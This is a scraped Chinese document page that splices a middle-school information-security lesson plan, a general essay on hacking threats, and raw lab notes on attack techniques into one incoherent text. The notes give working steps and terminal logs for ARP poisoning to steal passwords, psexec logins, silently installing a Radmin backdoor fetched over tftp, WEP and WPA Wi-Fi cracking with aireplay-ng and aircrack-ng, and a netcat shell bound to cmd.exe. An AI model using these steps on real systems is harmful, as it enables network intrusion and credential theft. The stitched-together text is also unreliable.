《信息安全概论》课件—04黑客攻击技术
- 格式:ppt
- 大小:2.45 MB
- 文档页数:58
第4课信息安全概论一、教材分析本节课教学内容来自《青岛出版社》出版的信息技术九年级下册,第3单元《体验数码生活》,第4课:《信息安全概论》.本节教材在上单元介绍信息的获取与分析、赢在网络时代的基础上进一步介绍了信息社会安全问题以及如何掌握信息安全的防护知识。
二、学情分析九年级学生已经具备了一定的信息技术水平,具有较强的信息搜索获取、加工、表达、发布交流的能力。
多数学生会使用手机、互联网进行交流,在使用现代通信工具的过程中,时常会遇到各种使用上的问题。
他们希望通过信息技术的学习以及上网搜索,解决生活、学习中的问题,对运用信息技术解决生活中遇到的问题有浓厚的兴趣.三、学习目标知识目标:①结合社会生活中的实例,了解信息安全的现状和内涵,了解掌握信息安全的基本防护措施;②理解计算机病毒的基本特征。
技能目标①掌握计算机病毒防范和信息保护的基本方法;②能初步判断计算机系统常见的硬件或软件故障。
情感、态度与价值观目标①树立信息安全意识;②关注信息安全的应用;③体验信息安全的内涵.四、重点难点1.重点:了解掌握信息安全的基本防护措施解决措施:采取问题任务驱动、逐步推进、形成性地知识建构,通过一个个的问题任务来完成技能的学习,小组之间相互协助,教师巡回辅导。
2。
难点:能初步判断计算机系统常见的硬件或软件故障,知道防范病毒的措施。
解决措施:先让学生认真看课本上介绍的方法,然后自己尝试,接着找优秀学生讲述自己的方法,最后教师再进一步强调具体步骤及注意事项。
五、教学策略这节课我利用多媒体网络教室进行教学,通过多媒体网络教室的演示、反馈等功能充分利用文字、图片、等手段帮助学生学习,提高教学效率。
为了全面实现教学目标,有效地突出重点,突破难点,我主要采用情景教学法、主动尝试法、任务驱动法。
使学生明确本节课的学习任务,激活学生的思维,提高学生分析问题、解决问题的能力。
达到寓教于乐,使学生灵活掌握本节知识的教学目标。
六、教学资源及环境硬件环境:多媒体网络机房软件资源:多媒体课件,极域电子教室4.0七、课型与课时课型:新授课课时:1课时八、教学过程(一)、激情导入新课(约5分钟)同学们,你们或你们的家长进行过网上购物吗?知道网上购物有什么风险吗?学生回答,知道,有木马病毒,会损失钱财等等.大家通过课件来了解这些生活中常见的网上购物遇到的情况。
1、creative ideaHackerCIA--信息安全概念Confidentality:保密性Top secret /secret /confidential / pulic or classifiedSniffer:攻击技术加密:防御技术Intergirty:完整性HashAvailability :可用性Controllability:可控性mtd<1day3AAuthentication:身份验证deauthenticaion1、static user&password2、pki/ca3、two factor authentication(pin+token code)4、finger生物识别Authorization:授权Subject ---------------------objectAcl(access control list)Dac(discretionary access control 自由的访问控制)Mac(mandatory access control 强制的访问控制)Subject & object一一对应关系Rbac(Role base access control 角色访问控制)SysadminRule base access control 给予规则的访问控制)Accounting/audit:记账审核SyslogUDP 0.0.0.0:514 *:*Arp (address resolve protocol) ip----mac应用层传输层网络层链路层Rarp(revserse arp) mac----ip1、WiresharkWinpcap--使网卡变成混杂模式需要管理员权限、以太网有线网卡而无线网卡是处于monitor mode在capture filter:tcp/udp/arp/ip在display filter:ftp/telnet/http/tcp/udp/arp如果看arp数据包eth.addr==mac如果看ip数据包ip.addr==ip2、能捕获到自己访问ftp的用户名与密码3、能否捕获别人的用户名与密码,并说明原因Cain:apr(arp posion routing) 、暴力破解密码选择升级winpcap1、configure--选择网卡和工作模式2、start sniffer (按钮)--mac scanner3、apr4、在password标签,查看密码如果是full-routing:双向欺骗成功如果是half-routing: 如果客户端数据包是0 ,说明客户端arp防火墙如果网关数据包是0,说明路由器arp防护Xp_cmdshell1、地址已经被占用2、地址冲突相同的ip有不同的mac,就会出现地址冲突Arp 不能跨vlan,不能跨router三层网关交换机Port-isolate port vlan1Pppoe服务器的创建步骤1、interface/print2、设定ip地址Add address=10.1.1.1 netmask=255.255.255.03、ip pool (地址池)4、ppp--pppoe--添加pppoe服务器/注意service name5、Ppp--profile 添加profile6、Ppp--secrets 添加用户名与密码1、检测具有管理员权限主机2、检测网卡模式3、抓包,分析(没有mac&ip spoofing)4、用solarwinds 查看每个interface 的arp cache网络层扫描sTsSsFCnsafer.rarNmap.exe -sT/sS/sF -v 172.19.1.236Redbutton.exePass.bat 字典文件ip 用户名在c盘下生成一个pass.txtPsexec.exe \\ip -u administrator -p 12345 cmd.exe/前提对方主机默认配置为admin$打开在攻击主机上开始tftp服务器在psexec窗口执行上传操作Tftp -i tftp服务器ip地址get (put方向不一样)r_server.exe/raddrv.dll/admdll.dll/aaa.reg 安装后门r_server.exe /install /silencer_server.exe /port:9999 /pass:111 /save /silenceRegedit /s aaa.regNet start r_server用netstat -an 确认端口开启用radmin客户端去连接控制反弹型木马1、花生壳、免费域名无线网络破解1、通讯的安全=算法*密钥*协议Networkstumble 1、bssid:mac 2、essid:名字3、channel 4、encryption 加密类型wep/wpa/wpa22、用omnipeek抓包破解wep 64b ---- 400000Wep 128b ------1m3、用winaircrack 破解捕获的数据包Windwos平台破解Bt3破解如果fake authentication 不能功-o 10Last login: Sun Dec 7 03:19:36 2008 from 172.19.1.211Linux 2.6.21.5.bt ~ # aireplay-ngAireplay-ng 1.0 rc1 r1083 - (C) 2006,2007,2008 Thomas d'OtreppeOriginal work: Christophe Devineusage: aireplay-ng <options> <replay interface>Filter options:-b bssid : MAC address, Access Point-d dmac : MAC address, Destination-s smac : MAC address, Source-m len : minimum packet length-n len : maximum packet length-u type : frame control, type field-v subt : frame control, subtype field-t tods : frame control, To DS bit-f fromds : frame control, From DS bit-w iswep : frame control, WEP bit-D : disable AP detectionReplay options:-x nbpps : number of packets per second-p fctrl : set frame control word (hex)-a bssid : set Access Point MAC address-c dmac : set Destination MAC address-h smac : set Source MAC address-g value : change ring buffer size (default: 8)-F : choose first matching packetFakeauth attack options:-e essid : set target AP SSID-o npckts : number of packets per burst (0=auto, default: 1) -q sec : seconds between keep-alives-y prga : keystream for shared key authArp Replay attack options:-j : inject FromDS packetsFragmentation attack options:-k IP : set destination IP in fragments-l IP : set source IP in fragmentsTest attack options:-B : activates the bitrate testsource options:-i iface : capture packets from this interface-r file : extract packets from this pcap fileattack modes (Numbers can still be used):--deauth count : deauthenticate 1 or all stations (-0)--fakeauth delay : fake authentication with AP (-1)--interactive : interactive frame selection (-2)--arpreplay : standard ARP-request replay (-3)--chopchop : decrypt/chopchop WEP packet (-4)--fragment : generates valid keystream (-5)--caffe-latte : query a client for new IVs (-6)--cfrag : fragments against a client (-7)--test : tests injection and quality (-9)--help : Displays this usage screenNo replay interface specified.bt ~ # ifconfig -aeth0 Link encap:Ethernet HWaddr 00:0C:29:4A:BF:A9inet addr:172.19.1.200 Bcast:172.19.255.255 Mask:255.255.0.0UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1RX packets:3475 errors:0 dropped:0 overruns:0 frame:0TX packets:4434 errors:0 dropped:0 overruns:0 carrier:0collisions:0 txqueuelen:1000RX bytes:292204 (285.3 KiB) TX bytes:3357741 (3.2 MiB)Interrupt:16 Base address:0x2000lo Link encap:Local Loopbackinet addr:127.0.0.1 Mask:255.0.0.0UP LOOPBACK RUNNING MTU:16436 Metric:1RX packets:0 errors:0 dropped:0 overruns:0 frame:0TX packets:0 errors:0 dropped:0 overruns:0 carrier:0collisions:0 txqueuelen:0RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)wlan0 Link encap:UNSPEC HWaddr 00-C0-CA-1E-E2-B4-00-00-00-00-00-00-00-00-00-00UP BROADCAST NOTRAILERS RUNNING PROMISC ALLMULTI MTU:1500 Metric:1RX packets:8840 errors:0 dropped:0 overruns:0 frame:0TX packets:0 errors:0 dropped:0 overruns:0 carrier:0collisions:0 txqueuelen:1000RX bytes:1233831 (1.1 MiB) TX bytes:0 (0.0 b)bt ~ # aireplay-ng -1 0 -a 00:1f:33:d3:7c:f4 -h 00:C0:CA:1E:E2:B4 wlan003:31:37 Waiting for beacon frame (BSSID: 00:1F:33:D3:7C:F4) on channel 103:31:37 Sending Authentication Request (Open System) [ACK]03:31:37 Authentication successful03:31:37 Sending Association Request [ACK]03:31:37 Association successful :-) (AID: 1)bt ~ # aireplay-ngAireplay-ng 1.0 rc1 r1083 - (C) 2006,2007,2008 Thomas d'Otreppe Original work: Christophe Devineusage: aireplay-ng <options> <replay interface>Filter options:-b bssid : MAC address, Access Point-d dmac : MAC address, Destination-s smac : MAC address, Source-m len : minimum packet length-n len : maximum packet length-u type : frame control, type field-v subt : frame control, subtype field-t tods : frame control, To DS bit-f fromds : frame control, From DS bit-w iswep : frame control, WEP bit-D : disable AP detectionReplay options:-x nbpps : number of packets per second-p fctrl : set frame control word (hex)-a bssid : set Access Point MAC address-c dmac : set Destination MAC address-h smac : set Source MAC address-g value : change ring buffer size (default: 8)-F : choose first matching packetFakeauth attack options:-e essid : set target AP SSID-o npckts : number of packets per burst (0=auto, default: 1)-q sec : seconds between keep-alives-y prga : keystream for shared key authArp Replay attack options:-j : inject FromDS packetsFragmentation attack options:-k IP : set destination IP in fragments-l IP : set source IP in fragmentsTest attack options:-B : activates the bitrate testsource options:-i iface : capture packets from this interface-r file : extract packets from this pcap fileattack modes (Numbers can still be used):--deauth count : deauthenticate 1 or all stations (-0)--fakeauth delay : fake authentication with AP (-1)--interactive : interactive frame selection (-2)--arpreplay : standard ARP-request replay (-3)--chopchop : decrypt/chopchop WEP packet (-4)--fragment : generates valid keystream (-5)--caffe-latte : query a client for new IVs (-6)--cfrag : fragments against a client (-7)--test : tests injection and quality (-9)--help : Displays this usage screenNo replay interface specified.bt ~ # aireplay-ng -5 -b 00:1f:33:d3:7c:f4 -h 00:C0:CA:1E:E2:B4 wlan003:33:40 Waiting for beacon frame (BSSID: 00:1F:33:D3:7C:F4) on channel 1 03:33:40 Waiting for a data packet...Read 210 packets...Size: 107, FromDS: 0, ToDS: 1 (WEP)BSSID = 00:1F:33:D3:7C:F4Dest. MAC = 00:1F:33:D3:7C:F4Source MAC = 00:0C:F1:21:5E:EB0x0000: 0841 d500 001f 33d3 7cf4 000c f121 5eeb .A....3.|....!^.0x0010: 001f 33d3 7cf4 0039 1c24 f400 9af4 0dbb ..3.|..9.$......0x0020: 0ca8 ebf1 e460 1a05 fb96 943f d1e5 819d .....`.....?....0x0030: a7bb 241b 3db4 517a 935d 82e6 d851 beca ..$.=.Qz.]...Q..0x0040: 7257 d1f2 e17d 4715 6116 90cf 83cd d987 rW...}G.a.......0x0050: 772f 6675 26d6 76d6 99f1 08d8 b8ec c13e w/fu&.v........>0x0060: e495 2a0a c933 90d9 4330 e3 ..*..3..C0.Use this packet ? ySaving chosen packet in replay_src-1207-033342.cap03:33:48 Data packet found!03:33:48 Sending fragmented packet03:33:48 Got RELAYED packet!!03:33:48 Trying to get 384 bytes of a keystream03:33:48 Got RELAYED packet!!03:33:48 Trying to get 1500 bytes of a keystream03:33:48 Got RELAYED packet!!Saving keystream in fragment-1207-033348.xorNow you can build a packet with packetforge-ng out of that 1500 bytes keystream bt ~ # packetforge-ngPacketforge-ng 1.0 rc1 r1083 - (C) 2006,2007,2008 Thomas d'Otreppe Original work: Christophe Devine and Martin BeckUsage: packetforge-ng <mode> <options>Forge options:-p <fctrl> : set frame control word (hex)-a <bssid> : set Access Point MAC address-c <dmac> : set Destination MAC address-h <smac> : set Source MAC address-j : set FromDS bit-o : clear ToDS bit-e : disables WEP encryption-k <ip[:port]> : set Destination IP [Port]-l <ip[:port]> : set Source IP [Port]-t ttl : set Time To Live-w <file> : write packet to this pcap file-s <size> : specify size of null packet-n <packets> : set number of packets to generateSource options:-r <file> : read packet from this raw file-y <file> : read PRGA from this fileModes:--arp : forge an ARP packet (-0)--udp : forge an UDP packet (-1)--icmp : forge an ICMP packet (-2)--null : build a null packet (-3)--custom : build a custom packet (-9)--help : Displays this usage screenPlease specify a mode.bt ~ #packetforge-ng -0 -a 00:1f:33:d3:7c:f4 -h 00:C0:CA:1E:E2:B4 -l 255.255.255.255 -k 255.255.255.255 -y /root/frfragment-1020-130603.xor fragment-1108-025108.xor fragment-1130-070213.xorfragment-1028-071313.xor fragment-1112-081947.xor fragment-1206-053848.xorfragment-1028-084211.xor fragment-1125-061640.xor fragment-1207-033348.xorbt ~ # packetforge-ng -0 -a 00:1f:33:d3:7c:f4 -h 00:C0:CA:1E:E2:B4 -l 255.255.255.255 -k 255.255.255.255 -y /root/fragment-1207-033348.xor -r taiyuanarp wlan0open failed: No such file or directorybt ~ # packetforge-ng -0 -a 00:1f:33:d3:7c:f4 -h 00:C0:CA:1E:E2:B4 -l 255.255.255.255 -k 255.255.255.255 -y /root/fragment-1207-033348.xor -w taiyuanarp wlan0Wrote packet to: taiyuanarpbt ~ # aireplay-ngAireplay-ng 1.0 rc1 r1083 - (C) 2006,2007,2008 Thomas d'OtreppeOriginal work: Christophe Devineusage: aireplay-ng <options> <replay interface>Filter options:-b bssid : MAC address, Access Point-d dmac : MAC address, Destination-s smac : MAC address, Source-m len : minimum packet length-n len : maximum packet length-u type : frame control, type field-v subt : frame control, subtype field-t tods : frame control, To DS bit-f fromds : frame control, From DS bit-w iswep : frame control, WEP bit-D : disable AP detectionReplay options:-x nbpps : number of packets per second-p fctrl : set frame control word (hex)-a bssid : set Access Point MAC address-c dmac : set Destination MAC address-h smac : set Source MAC address-g value : change ring buffer size (default: 8)-F : choose first matching packetFakeauth attack options:-e essid : set target AP SSID-o npckts : number of packets per burst (0=auto, default: 1) -q sec : seconds between keep-alives-y prga : keystream for shared key authArp Replay attack options:-j : inject FromDS packetsFragmentation attack options:-k IP : set destination IP in fragments-l IP : set source IP in fragmentsTest attack options:-B : activates the bitrate testsource options:-i iface : capture packets from this interface-r file : extract packets from this pcap fileattack modes (Numbers can still be used):--deauth count : deauthenticate 1 or all stations (-0)--fakeauth delay : fake authentication with AP (-1)--interactive : interactive frame selection (-2)--arpreplay : standard ARP-request replay (-3)--chopchop : decrypt/chopchop WEP packet (-4) --fragment : generates valid keystream (-5)--caffe-latte : query a client for new IVs (-6)--cfrag : fragments against a client (-7)--test : tests injection and quality (-9)--help : Displays this usage screenNo replay interface specified.bt ~ # aireplay-ng -2 -b 00:1f:33:d3:7c:f4 -h 00:C0:CA:1E:E2:B4No replay interface specified."aireplay-ng --help" for help.bt ~ # aireplay-ng -2 -x 1024 -b 00:1f:33:d3:7c:f4 -h 00:C0:CA:1E:E2:B4 -r /root/taiyuanarp wlan0Size: 68, FromDS: 0, ToDS: 1 (WEP)BSSID = 00:1F:33:D3:7C:F4Dest. MAC = FF:FF:FF:FF:FF:FFSource MAC = 00:C0:CA:1E:E2:B40x0000: 0841 0201 001f 33d3 7cf4 00c0 ca1e e2b4 .A....3.|.......0x0010: ffff ffff ffff 8001 8268 cb00 f50e 9369 .........h.. (i)0x0020: b050 8f87 9697 48ad 5237 d0de ad4b 0d4f .P....H.R7...K.O0x0030: 4f31 d217 feb0 2b52 b1a3 b8fa a535 9bca O1....+R.....5..0x0040: b3ac a461 ...aUse this packet ? ySaving chosen packet in replay_src-1207-033730.capYou should also start airodump-ng to capture replies.End of file.bt ~ #bt taiyuan # aircrack-ng *.ivsOpening taiyuan-01.ivsRead 9753 packets.# BSSID ESSID Encryption1 00:1F:33:D3:7C:F4 sony WEP (9751 IVs)2 00:60:B3:33:7C:01 Shanxi University Wireless UnknownIndex number of target network ? 1Opening taiyuan-01.ivsAttack will be restarted every 5000 captured ivs.Starting PTW attack with 10666 ivs.破解wpaaireplay-ng -0 5 -a 00:1f:33:d3:7c:f4 -c 00-1B-77-11-1D-11 wlan0aircrack-ng *.ivs -w /root/wordlist.txt (hash 彩虹表)/需要抓到一次完整的四次handshake 才可以缓冲区溢出1、在a主机上nc.exe -l -p 8000 在b主机telnet ip_a 80002、在a主机上nc.exe -l -p 9000 -t -e c:\windows\system32\cmd.exe 。
威胁网络安全的黑客技术网络安全问题已经逐渐成为人们越来越关注的话题,而黑客技术正是威胁网络安全的一个重要方面。
黑客技术并不是一个新鲜的话题,早在上世纪六七十年代,黑客就开始利用技术手段进行破坏和攻击。
随着互联网的飞速发展,黑客技术变得越来越成熟和高级,其对数字安全的威胁也越来越高。
本文将从多个角度对威胁网络安全的黑客技术进行讨论。
一、钓鱼攻击技术钓鱼攻击技术指的是通过网络钓鱼邮件、连接和信息等方式,将个人信息、财务信息和银行账户等敏感信息骗取出来的黑客技术。
钓鱼攻击通常会欺骗用户打开看似合法的链接,向网站提供个人信息,致使个人账户被黑客盗取。
尤其是在电子商务、金融服务、社交媒体等领域,黑客通过钓鱼攻击技术进行窃取和利用用户信息的行为越来越多。
二、勒索软件攻击技术勒索软件技术指的是通过入侵用户电脑系统,将文件加密并锁定,然后恐吓用户进行“赎金”付款,才能够解锁文件的攻击技术。
勒索软件通常会针对个人或企业用户的重要文件进行攻击,并采取高度隐蔽的方式传播。
许多人在发现电脑文件被加密无法打开时,不得不支付“赎金”才能解锁重要文件,否则将可能面临损失严重。
三、恶意软件攻击技术恶意软件技术指的是通过网络下载或安装恶意软件进行入侵、肆虐、盗窃和破坏的黑客技术。
恶意软件通常会针对用户的常用操作系统、应用软件和打开的文件进行攻击,如勒索软件、木马病毒、网络蠕虫等。
这些恶意软件一旦入侵,就会对用户电脑系统产生严重影响,如造成个人或企业财务损失、数据丢失和泄露等后果。
四、网络钓鱼技术网络钓鱼技术指的是通过欺骗和诱骗用户输入个人信息、账户密码和授权等信息,获取用户账户信息并利用这些信息进行攻击的黑客技术。
网络钓鱼通常会伪装成商业网站、在线银行、社交媒体等官方网站进行攻击,让用户自愿输入敏感信息被窃取。
黑客可以利用窃取的账户信息进行大规模的网络攻击,并导致财务、个人隐私等方面的风险。
五、无线网络攻击技术无线网络攻击技术指的是通过窃取和篡改无线网络密码和登录信息,获取用户个人信息,入侵他们的计算机系统和手机,并通过这些渠道进行黑客攻击的技术。